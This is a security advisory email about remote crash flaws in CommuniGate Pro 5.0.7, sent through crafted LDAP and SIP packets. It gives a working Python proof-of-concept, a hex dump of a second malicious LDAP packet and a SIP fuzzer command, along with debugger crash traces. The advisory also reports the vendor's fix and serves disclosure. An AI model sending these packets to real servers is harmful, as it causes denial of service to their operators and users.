[UNIX] CommuniGate Pro Server Multiple DoS (LDAP, SIP)
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 7 Feb 2006 16:25:34 +0200
Subject: [UNIX] CommuniGate Pro Server Multiple DoS (LDAP, SIP)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20060207165028.AA88457D5@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
CommuniGate Pro Server Multiple DoS (LDAP, SIP)
------------------------------------------------------------------------
SUMMARY
" <http://www.stalker.com/content/solutions.htm>; CommuniGate Pro is the
most scalable and modern Internet Communications application server on the
market today. "
Improper handling of multiple LDAP and SIP usage allows attackers to
remotely crash CommuniGate Pro.
DETAILS
Vulnerable Systems:
* CommuniGate Pro Server version 5.0.7
Immune Systems:
* CommuniGate Pro Server version 5.0.8
LDAP DoS:
By crafting a special LDAP packet, attackers can crash the server
remotely.
Proof of Concept:
#!/usr/bin/env python
# Use this code at your own risk.
# It may crash your server!
# Author: Evgeny Legerov
import sys
import socket
HELP="""
CommuniGate Pro 5.0.6 vulnerability.
Found with ProtoVer LDAP testsuite v1.1
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1389495376 (LWP 20235)]
0xada99bbc in memcpy () from /lib/libc.so.6
(gdb) backtrace
#0 0xada99bbc in memcpy () from /lib/libc.so.6
#1 0x083924b8 in STCopyCString ()
#2 0x08349d5b in BERPackedData::makeCString ()
#3 0x081ae71a in VLDAPInput::processBINDrequest ()
#4 0x081af747 in VLDAPInput::processInput ()
#5 0x082c9373 in VStream::worker ()
#6 0x082ca1e9 in VStream::starter ()
#7 0x08399e7d in STThreadStarter ()
#8 0xadb8bb80 in start_thread () from /lib/libpthread.so.0
#9 0xadaf8dee in clone () from /lib/libc.so.6
(gdb) x/i $eip
0xada99bbc <memcpy+28>: repz movsl %ds:(%esi),%es:(%edi)
(gdb) info regi esi edi ecx
esi 0x8688961 141068641
edi 0x86c6fff 141324287
ecx 0x3fff7eae 1073708718
"""
print HELP
host="localhost"
port=389
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))
s = "\x30\x12\x02\x01\x01\x60\x0d\x02\x01\x03\x04\x02\x44\x4e\x80"
s += "\x84\xff\xff\xff\xff"
sock.sendall(s)
sock.close()
1+1=2
LDAP DoS:
By crafting special LDAP packet, attackers can crash the server remotely.
Example:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1458242640 (LWP 25554)]
0x080fa008 in VDirectoryFile::findParentDN ()
(gdb) backtrace
#0 0x080fa008 in VDirectoryFile::findParentDN ()
#1 0x080fa031 in VDirectoryFile::findParentDN ()
..
#353 0x080fa031 in VDirectoryFile::findParentDN ()
#354 0x080fcc6f in VDirectoryFile::findRecords ()
#355 0x080efc23 in VDirectory::findDirectoryRecords ()
#356 0x081b09b3 in VLDAPInput::processInput ()
#357 0x082cb5a3 in VStream::worker ()
#358 0x082cc419 in VStream::starter ()
#359 0x0839c369 in STThreadStarter ()
#360 0xa9a09b80 in start_thread () from /lib/libpthread.so.0
#361 0xa9976dee in clone () from /lib/libc.so.6
To reproduce the vulnerability, send the following data to LDAP port:
"""
30 82 02 38 02 01 01 63 82 02 31 04 82 02 15 64
63 3d 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
2c 2c 2c 64 63 3d 65 78 61 6d 70 6c 65 2c 64 63
3d 63 6f 6d 0a 01 02 0a 01 00 02 01 00 02 01 00
01 01 00 a2 05 87 03 66 6f 6f 30 00
SIP DoS:
By crafting special SIP packet, attackers can crash the server remotely.
Example:
StarGate:~# java -jar c07-sip-r2.jar -touri [email protected]
-single 2361
Log file snippet:
Dec 9 16:18:14 localhost CommuniGatePro: CommuniGate Pro Server 5.0.3
started
Dec 9 16:20:35 localhost CommuniGatePro: Exception signal: 11, trying to
recover
Dec 9 16:20:35 localhost CommuniGatePro: Exception in <STThread 87394E8
UDPReceiver 5060>
Dec 9 16:21:07 localhost CommuniGatePro: CommuniGate Pro Server 5.0.3
started
Dec 9 16:21:33 localhost CommuniGatePro: Exception signal: 11, trying to
recover
Dec 9 16:21:33 localhost CommuniGatePro: Exception in <STThread 8738B60
UDPReceiver 5060>
0x4010e3ac in memmove () from /lib/libc.so.6
(gdb) i r
eax 0xffffffe0 -32
ecx 0x1 1
edx 0xffffffe1 -31
ebx 0x8699758 141137752
esp 0xbabff670 0xbabff670
ebp 0xbabff678 0xbabff678
esi 0x868eeae 141094574
edi 0xffffffe0 -32
eip 0x4010e3ac 0x4010e3ac
(gdb) x/i $pc
0x4010e3ac <memmove+92>: repz movsb %ds:(%esi),%es:(%edi)
(gdb) bt
#0 0x4010e3ac in memmove () from /lib/libc.so.6
#1 0x0836cdac in SBMutableData::setBytes ()
#2 0x08280964 in VSIPPacket::parseFields ()
#3 0x0827f8da in VSIPPacket::parseData ()
#4 0x0827c8e8 in VSIP::processReadPacket ()
#5 0x0827ce83 in VSIP::processUDPRequest ()
#6 0x081bfeb1 in VUDPListener::receiver ()
#7 0x081bfa71 in VUDPListener::receiverStarter ()
#8 0x0838ad1d in STThreadStarter ()
#9 0x4002af4c in pthread_start_thread () from /lib/libpthread.so.0
#10 0x4002afda in pthread_start_thread_event () from /lib/libpthread.so.0
#11 0x4015f92a in clone () from /lib/libc.so.6
Vendor Status:
The vendor has issued a new version with fixes: CommuniGate Pro Server
version 5.0.8
ADDITIONAL INFORMATION
The information has been provided by <mailto:research@gleg.net.> Evgeny
Legerov and <mailto:kf_lists@digitalmunition.com.> KF .
The original article can be found at:
<http://www.gleg.net/cg_advisory.txt>; http://www.gleg.net/cg_advisory.txt
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
